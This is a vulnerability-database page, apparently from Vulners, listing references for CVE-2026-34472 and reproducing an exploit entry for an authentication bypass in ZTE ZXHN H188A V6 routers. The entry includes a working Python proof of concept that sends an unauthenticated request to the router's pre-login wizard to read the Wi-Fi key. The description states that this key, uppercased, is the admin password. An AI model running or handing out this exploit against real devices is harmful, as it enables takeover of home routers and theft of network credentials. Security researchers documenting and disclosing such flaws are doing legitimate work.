| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2026-34472 | 30 Mar 202600:00 | โ | attackerkb | |
| CVE-2026-34472 | 27 Mar 202623:26 | โ | circl | |
| ZTE ZXHN H188A ๅฎๅ จๆผๆด | 30 Mar 202600:00 | โ | cnnvd | |
| CVE-2026-34472 | 30 Mar 202600:00 | โ | cve | |
| CVE-2026-34472 | 30 Mar 202600:00 | โ | cvelist | |
| ZTE ZXHN H188A V6 - Authentication Bypass | 29 May 202600:00 | โ | exploitdb | |
| EUVD-2026-17107 | 30 Mar 202618:31 | โ | euvd | |
| CVE-2026-34472 | 30 Mar 202616:16 | โ | nvd | |
| ๐ ZTE ZXHN H188A V6 Authentication Bypass | 26 May 202600:00 | โ | packetstorm | |
| PT-2026-29045 | 30 Mar 202600:00 | โ | ptsecurity |
# Title: ZTE ZXHN H188A V6 - Authentication Bypass via Pre-Login Wizard
Credential Leak
# Date: 2026-05-20
# Author: Mina Nageh Salalma (Monx Research)
# CVE: CVE-2026-34472
# Vendor: ZTE Corporation
# Affected: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
# Category: Remote / Webapps
# Description:
# Unauthenticated requests with _type parameter bypass the QuickSetupEnable
# gate, exposing wizard handlers that return WLAN PSKs, SSIDs, PPPoE
usernames.
# Leaked Wi-Fi PSK == admin password after uppercasing = full auth bypass.
#
# MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34472
# Write-up:
https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
# PoC:
import requests
data = {"IF_ACTION": "getPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
"PASSTYPE": "PSK"}
params = {"_type": "loginData", "_tag": "login_entry"}
r = requests.post("http://TARGET_IP/", params=params, data=data,
timeout=10, verify=False)
print(r.text[:2000])Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation